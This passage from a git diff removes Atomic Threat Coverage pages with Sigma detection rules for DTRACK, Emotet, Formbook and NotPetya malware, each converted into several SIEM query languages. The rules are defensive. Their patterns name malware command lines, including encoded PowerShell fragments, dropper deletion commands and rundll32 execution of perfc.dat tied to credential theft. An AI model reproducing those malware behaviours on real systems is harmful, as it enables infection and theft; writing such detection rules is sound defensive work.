-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unlikely</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://securelist.com/my-name-is-dtrack/93338/](https://securelist.com/my-name-is-dtrack/93338/)</li><li>[https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/](https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/)</li><li>[https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/](https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: DTRACK Process Creation
-id: f1531fa4-5b84-4342-8f68-9cf3fdbd83d4
-status: experimental
-description: Detects specific process parameters as seen in DTRACK infections
-author: Florian Roth
-date: 2019/10/30
-references:
-    - https://securelist.com/my-name-is-dtrack/93338/
-    - https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/
-    - https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine: '* echo EEEE > *'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Unlikely
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.* echo EEEE > .*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:*\ echo\ EEEE\ >\ *
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f1531fa4-5b84-4342-8f68-9cf3fdbd83d4 <<EOF
-{
-  "metadata": {
-    "title": "DTRACK Process Creation",
-    "description": "Detects specific process parameters as seen in DTRACK infections",
-    "tags": "",
-    "query": "winlog.event_data.CommandLine.keyword:*\\ echo\\ EEEE\\ >\\ *"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:*\\ echo\\ EEEE\\ >\\ *",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'DTRACK Process Creation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:* echo EEEE > *
-```
-
-
-### splunk
-    
-```
-CommandLine="* echo EEEE > *" | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="* echo EEEE > *")
-```
-
-
-### grep
-    
-```
-grep -P '^.* echo EEEE > .*'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_malware_emotet.md b/Atomic_Threat_Coverage/Detection_Rules/win_malware_emotet.md
deleted file mode 100644
index 3108e3d..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_malware_emotet.md
+++ /dev/null
@@ -1,181 +0,0 @@
-| Title                    | Emotet Process Creation       |
-|:-------------------------|:------------------|
-| **Description**          | Detects all Emotet like process executions that are not covered by the more generic rules |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unlikely</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/](https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/)</li><li>[https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/](https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/)</li><li>[https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/](https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/)</li><li>[https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/](https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Emotet Process Creation
-id: d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18
-status: experimental
-description: Detects all Emotet like process executions that are not covered by the more generic rules
-author: Florian Roth
-date: 2019/09/30
-modified: 2019/10/16
-references:
-    - https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/
-    - https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/
-    - https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/
-    - https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - '* -e* PAA*'
-            - '*JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ*'  # $env:userprofile
-            - '*QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA*'  # $env:userprofile
-            - '*kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA*'  # $env:userprofile
-            - '*IgAoACcAKgAnACkAOwAkA*'  # "('*');$
-            - '*IAKAAnACoAJwApADsAJA*'  # "('*');$
-            - '*iACgAJwAqACcAKQA7ACQA*'  # "('*');$
-            - '*JABGAGwAeAByAGgAYwBmAGQ*'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Unlikely
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.* -e.* PAA.*" -or $_.message -match "CommandLine.*.*JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ.*" -or $_.message -match "CommandLine.*.*QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA.*" -or $_.message -match "CommandLine.*.*kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA.*" -or $_.message -match "CommandLine.*.*IgAoACcAKgAnACkAOwAkA.*" -or $_.message -match "CommandLine.*.*IAKAAnACoAJwApADsAJA.*" -or $_.message -match "CommandLine.*.*iACgAJwAqACcAKQA7ACQA.*" -or $_.message -match "CommandLine.*.*JABGAGwAeAByAGgAYwBmAGQ.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*\ \-e*\ PAA* OR *JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ* OR *QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA* OR *kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA* OR *IgAoACcAKgAnACkAOwAkA* OR *IAKAAnACoAJwApADsAJA* OR *iACgAJwAqACcAKQA7ACQA* OR *JABGAGwAeAByAGgAYwBmAGQ*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18 <<EOF
-{
-  "metadata": {
-    "title": "Emotet Process Creation",
-    "description": "Detects all Emotet like process executions that are not covered by the more generic rules",
-    "tags": "",
-    "query": "winlog.event_data.CommandLine.keyword:(*\\ \\-e*\\ PAA* OR *JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ* OR *QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA* OR *kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA* OR *IgAoACcAKgAnACkAOwAkA* OR *IAKAAnACoAJwApADsAJA* OR *iACgAJwAqACcAKQA7ACQA* OR *JABGAGwAeAByAGgAYwBmAGQ*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*\\ \\-e*\\ PAA* OR *JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ* OR *QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA* OR *kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA* OR *IgAoACcAKgAnACkAOwAkA* OR *IAKAAnACoAJwApADsAJA* OR *iACgAJwAqACcAKQA7ACQA* OR *JABGAGwAeAByAGgAYwBmAGQ*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Emotet Process Creation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(* \-e* PAA* *JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ* *QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA* *kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA* *IgAoACcAKgAnACkAOwAkA* *IAKAAnACoAJwApADsAJA* *iACgAJwAqACcAKQA7ACQA* *JABGAGwAeAByAGgAYwBmAGQ*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="* -e* PAA*" OR CommandLine="*JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ*" OR CommandLine="*QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA*" OR CommandLine="*kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA*" OR CommandLine="*IgAoACcAKgAnACkAOwAkA*" OR CommandLine="*IAKAAnACoAJwApADsAJA*" OR CommandLine="*iACgAJwAqACcAKQA7ACQA*" OR CommandLine="*JABGAGwAeAByAGgAYwBmAGQ*") | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["* -e* PAA*", "*JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ*", "*QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA*", "*kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA*", "*IgAoACcAKgAnACkAOwAkA*", "*IAKAAnACoAJwApADsAJA*", "*iACgAJwAqACcAKQA7ACQA*", "*JABGAGwAeAByAGgAYwBmAGQ*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.* -e.* PAA.*|.*.*JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ.*|.*.*QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA.*|.*.*kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA.*|.*.*IgAoACcAKgAnACkAOwAkA.*|.*.*IAKAAnACoAJwApADsAJA.*|.*.*iACgAJwAqACcAKQA7ACQA.*|.*.*JABGAGwAeAByAGgAYwBmAGQ.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_malware_formbook.md b/Atomic_Threat_Coverage/Detection_Rules/win_malware_formbook.md
deleted file mode 100644
index 58e0728..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_malware_formbook.md
+++ /dev/null
@@ -1,183 +0,0 @@
-| Title                    | Formbook Process Creation       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters. |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer](https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer)</li><li>[https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/](https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/)</li><li>[https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/](https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/)</li><li>[https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/](https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Formbook Process Creation
-id: 032f5fb3-d959-41a5-9263-4173c802dc2b
-status: experimental
-description: Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to
-    delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.
-author: Florian Roth
-date: 2019/09/30
-modified: 2019/10/31
-references:
-    - https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer
-    - https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/
-    - https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/
-    - https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        # Parent command line should not contain a space value
-        # This avoids false positives not caused by process injection
-        # e.g. wscript.exe /B sysmon-install.vbs
-        ParentCommandLine: 
-            - 'C:\Windows\System32\\*.exe'
-            - 'C:\Windows\SysWOW64\\*.exe'
-        CommandLine: 
-            - '* /c del "C:\Users\\*\AppData\Local\Temp\\*.exe'
-            - '* /c del "C:\Users\\*\Desktop\\*.exe'
-            - '* /C type nul > "C:\Users\\*\Desktop\\*.exe'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "ParentCommandLine.*C:\\Windows\\System32\\.*.exe" -or $_.message -match "ParentCommandLine.*C:\\Windows\\SysWOW64\\.*.exe") -and ($_.message -match "CommandLine.*.* /c del \"C:\\Users\\.*\\AppData\\Local\\Temp\\.*.exe" -or $_.message -match "CommandLine.*.* /c del \"C:\\Users\\.*\\Desktop\\.*.exe" -or $_.message -match "CommandLine.*.* /C type nul > \"C:\\Users\\.*\\Desktop\\.*.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentCommandLine.keyword:(C\:\\Windows\\System32\\*.exe OR C\:\\Windows\\SysWOW64\\*.exe) AND winlog.event_data.CommandLine.keyword:(*\ \/c\ del\ \"C\:\\Users\\*\\AppData\\Local\\Temp\\*.exe OR *\ \/c\ del\ \"C\:\\Users\\*\\Desktop\\*.exe OR *\ \/C\ type\ nul\ >\ \"C\:\\Users\\*\\Desktop\\*.exe))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/032f5fb3-d959-41a5-9263-4173c802dc2b <<EOF
-{
-  "metadata": {
-    "title": "Formbook Process Creation",
-    "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.",
-    "tags": "",
-    "query": "(winlog.event_data.ParentCommandLine.keyword:(C\\:\\\\Windows\\\\System32\\\\*.exe OR C\\:\\\\Windows\\\\SysWOW64\\\\*.exe) AND winlog.event_data.CommandLine.keyword:(*\\ \\/c\\ del\\ \\\"C\\:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*.exe OR *\\ \\/c\\ del\\ \\\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe OR *\\ \\/C\\ type\\ nul\\ >\\ \\\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentCommandLine.keyword:(C\\:\\\\Windows\\\\System32\\\\*.exe OR C\\:\\\\Windows\\\\SysWOW64\\\\*.exe) AND winlog.event_data.CommandLine.keyword:(*\\ \\/c\\ del\\ \\\"C\\:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*.exe OR *\\ \\/c\\ del\\ \\\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe OR *\\ \\/C\\ type\\ nul\\ >\\ \\\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Formbook Process Creation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentCommandLine.keyword:(C\:\\Windows\\System32\\*.exe C\:\\Windows\\SysWOW64\\*.exe) AND CommandLine.keyword:(* \/c del \"C\:\\Users\\*\\AppData\\Local\\Temp\\*.exe * \/c del \"C\:\\Users\\*\\Desktop\\*.exe * \/C type nul > \"C\:\\Users\\*\\Desktop\\*.exe))
-```
-
-
-### splunk
-    
-```
-((ParentCommandLine="C:\\Windows\\System32\\*.exe" OR ParentCommandLine="C:\\Windows\\SysWOW64\\*.exe") (CommandLine="* /c del \"C:\\Users\\*\\AppData\\Local\\Temp\\*.exe" OR CommandLine="* /c del \"C:\\Users\\*\\Desktop\\*.exe" OR CommandLine="* /C type nul > \"C:\\Users\\*\\Desktop\\*.exe")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentCommandLine IN ["C:\\Windows\\System32\\*.exe", "C:\\Windows\\SysWOW64\\*.exe"] CommandLine IN ["* /c del \"C:\\Users\\*\\AppData\\Local\\Temp\\*.exe", "* /c del \"C:\\Users\\*\\Desktop\\*.exe", "* /C type nul > \"C:\\Users\\*\\Desktop\\*.exe"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*C:\Windows\System32\\.*\.exe|.*C:\Windows\SysWOW64\\.*\.exe))(?=.*(?:.*.* /c del "C:\Users\\.*\AppData\Local\Temp\\.*\.exe|.*.* /c del "C:\Users\\.*\Desktop\\.*\.exe|.*.* /C type nul > "C:\Users\\.*\Desktop\\.*\.exe)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_malware_notpetya.md b/Atomic_Threat_Coverage/Detection_Rules/win_malware_notpetya.md
deleted file mode 100644
index fc34ce5..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_malware_notpetya.md
+++ /dev/null
@@ -1,195 +0,0 @@
-| Title                    | NotPetya Ransomware Activity       |
-|:-------------------------|:------------------|
-| **Description**          | Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and windows eventlogs are cleared using wevtutil |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1085: Rundll32](https://attack.mitre.org/techniques/T1085)</li><li>[T1070: Indicator Removal on Host](https://attack.mitre.org/techniques/T1070)</li><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li><li>[T1551: None](https://attack.mitre.org/techniques/T1551)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li><li>[T1551: None](../Triggers/T1551.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Admin activity</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://securelist.com/schroedingers-petya/78870/](https://securelist.com/schroedingers-petya/78870/)</li><li>[https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100](https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100)</li></ul>  |
-| **Author**               | Florian Roth, Tom Ueltschi |
-| Other Tags           | <ul><li>car.2016-04-002</li><li>attack.t1218.011</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: NotPetya Ransomware Activity
-id: 79aeeb41-8156-4fac-a0cd-076495ab82a1
-status: experimental
-description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and windows eventlogs are cleared using wevtutil
-author: Florian Roth, Tom Ueltschi
-date: 2019/01/16
-references:
-    - https://securelist.com/schroedingers-petya/78870/
-    - https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100
-tags:
-    - attack.execution
-    - attack.credential_access
-    - attack.defense_evasion
-    - attack.t1085
-    - attack.t1070
-    - attack.t1003
-    - car.2016-04-002
-    - attack.t1218.011
-    - attack.t1551
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    pipe_com:
-        CommandLine: '*\AppData\Local\Temp\\* \\.\pipe\\*'
-    rundll32_dash1:
-        Image: '*\rundll32.exe'
-        CommandLine: '*.dat,#1'
-    perfc_keyword:
-        - '*\perfc.dat*'
-    condition: 1 of them
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Admin activity
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and ($_.message -match "CommandLine.*.*\\AppData\\Local\\Temp\\.* \\.\\pipe\\.*" -or ($_.message -match "Image.*.*\\rundll32.exe" -and $_.message -match "CommandLine.*.*.dat,#1") -or $_.message -match "*\perfc.dat*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:*\\AppData\\Local\\Temp\\*\ \\.\\pipe\\* OR (winlog.event_data.Image.keyword:*\\rundll32.exe AND winlog.event_data.CommandLine.keyword:*.dat,#1) OR *\\perfc.dat*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/79aeeb41-8156-4fac-a0cd-076495ab82a1 <<EOF
-{
-  "metadata": {
-    "title": "NotPetya Ransomware Activity",
-    "description": "Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and windows eventlogs are cleared using wevtutil",
-    "tags": [
-      "attack.execution",
-      "attack.credential_access",
-      "attack.defense_evasion",
-      "attack.t1085",
-      "attack.t1070",
-      "attack.t1003",
-      "car.2016-04-002",
-      "attack.t1218.011",
-      "attack.t1551"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:*\\\\AppData\\\\Local\\\\Temp\\\\*\\ \\\\.\\\\pipe\\\\* OR (winlog.event_data.Image.keyword:*\\\\rundll32.exe AND winlog.event_data.CommandLine.keyword:*.dat,#1) OR *\\\\perfc.dat*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:*\\\\AppData\\\\Local\\\\Temp\\\\*\\ \\\\.\\\\pipe\\\\* OR (winlog.event_data.Image.keyword:*\\\\rundll32.exe AND winlog.event_data.CommandLine.keyword:*.dat,#1) OR *\\\\perfc.dat*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'NotPetya Ransomware Activity'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:*\\AppData\\Local\\Temp\\* \\.\\pipe\\* OR (Image.keyword:*\\rundll32.exe AND CommandLine.keyword:*.dat,#1) OR *\\perfc.dat*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*\\AppData\\Local\\Temp\\* \\.\\pipe\\*" OR (Image="*\\rundll32.exe" CommandLine="*.dat,#1") OR "*\\perfc.dat*") | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (CommandLine="*\\AppData\\Local\\Temp\\* \\.\\pipe\\*" OR (Image="*\\rundll32.exe" CommandLine="*.dat,#1") OR "*\\perfc.dat*"))
-```
-
-
-### grep
-    
